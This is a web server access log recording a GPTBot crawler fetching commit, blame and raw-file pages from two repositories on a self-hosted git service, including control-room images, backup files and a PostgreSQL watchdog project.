[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269761] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" +[17/Feb/2026:13:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9859] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" +[17/Feb/2026:13:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" +[17/Feb/2026:13:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" +[17/Feb/2026:13:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 74.7.227.38] [Length 11409] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15322] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11885] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 21805] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 21804] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498815] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 12771] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 10151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:13:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 74.7.227.38] [Length 9823] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" +[17/Feb/2026:13:58:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:13:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10379] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" +[17/Feb/2026:13:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" +[17/Feb/2026:13:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:13:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:13:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:13:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:13:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:13:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10994] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11161] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16192] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11210] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" +[17/Feb/2026:13:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" +[17/Feb/2026:13:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:13:58:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:13:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11399] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:13:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10131] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" +[17/Feb/2026:13:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10183] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10403] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10408] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 